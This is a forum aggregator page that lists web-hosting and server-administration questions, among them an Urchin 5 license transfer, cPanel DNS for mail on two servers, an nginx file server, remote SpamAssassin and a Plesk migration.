URL - when I add the path it says it's incorrect; if I add a fully qualified address, it accepts it but it doesn't work. Give me a specific example of the URL that can be entered relative to the root, as the format in the documentation isn't accepted. The last step is to restart IIS, which is also an issue as I can't seem to do this from the Plesk panel. It is as if it isn't catching the 500:100 error, and only catching the general 500 error??

View 1 Replies View Related

Urchin 5 / Google A . Transfering From Server To Server (Serial Already Activated)

Nov 21, 2006

I am currently running Google Analytics/Urchin 5 (v5.7.02) on a server. The server has started to act up (on its last legs etc.), and now I am trying to transfer the Urchin software to a new server, where it would work effectively.

However, upon installing the Urchin software on the new server and running it (localhost:9999), I am presented with an Action Items page and the following choices:

Obtain Demo License
Buy License
Activate Pre-Purchased License

I choose 'Activate Pre-Purchased License', pop in the serial number and complete the registration, then...

---------------------------------------------------------
Urchin Licensing Center -- Error!

An error has occurred during your transaction, please use the back button and correct the problem. The specific error message is:

• Unable to generate a license. Some possible reasons:

Your serial code is currently active <<< How do I disable it and use it on another server?
---------------------------------------------------------

So all I want to do is deactivate the serial and reactivate it on another server.

Does anyone have experience with this or a similar problem, or have a solution to this problem? Any help would be most appreciated.

Or even a contact number so that I can get someone on the phone!

View 2 Replies View Related

Cpanel Domain Name Server (DNS) Setting For Email On 2 Separate Servers

Nov 7, 2009

This is the scenario: domain.com is set up on server1; however, server2 also has the same profile of domain.com, as we use ns3 and ns4 under domain.com. This works fine with the nameserver setup on server2.

However, I encounter problems as the emails from server2 won't reach server1, as there is a duplicate profile on server2.

My question is how do I setup the DNS in cpanel/whm from server2 so the emails from server2 will reach server1?

Server1 (www.domain.com)
ns1.domain.com
ns2.domain.com

Server2
ns3.domain.com
ns4.domain.com

View 6 Replies View Related

File Server Setup With Nginx...how Do I Choose The Config For The Server

Apr 22, 2009

I just want to use a server for file sharing; it will have nginx and that's it. I'm looking at CentOS or FreeBSD, but I've been using CentOS forever now and I'm not sure how to use FreeBSD. Should I just stay with CentOS?

Do I tell my hosting provider to just install the OS and give me SSH access and that's it? Don't install any control panels or any other stuff? I want one domain and one subdomain on it though, and FTP access.

View 8 Replies View Related

Remote Spamassassin With Multiple Mail Servers (Smartermail Server)

May 12, 2009

Remote Spamassassin for Multiple Smartermail Servers

I want to set up remote Spamassassin (on Linux) for multiple Smartermail servers. I want to set up Spamassassin on a Linux box.

How can I set this up with multiple Smartermail servers?

View 6 Replies View Related

How To Transfer Backup Files From Linux Server To Windows Server

Jul 4, 2007

What is the fastest and best way?

View 4 Replies View Related

Plesk 12.x / Linux :: Full Server Migration To New Server With Same Hostname?

Jul 20, 2015

I'm wondering whether it is possible to perform a full server migration to a new Plesk server with the same hostname or will Plesk give an error about the hostname being the same?

The new server would not be accessible by hostname (only via IP) until DNS and glue records were changed after the migration.

View 1 Replies View Related

Copyrights 2005-15 www.BigResource.com, All rights reserved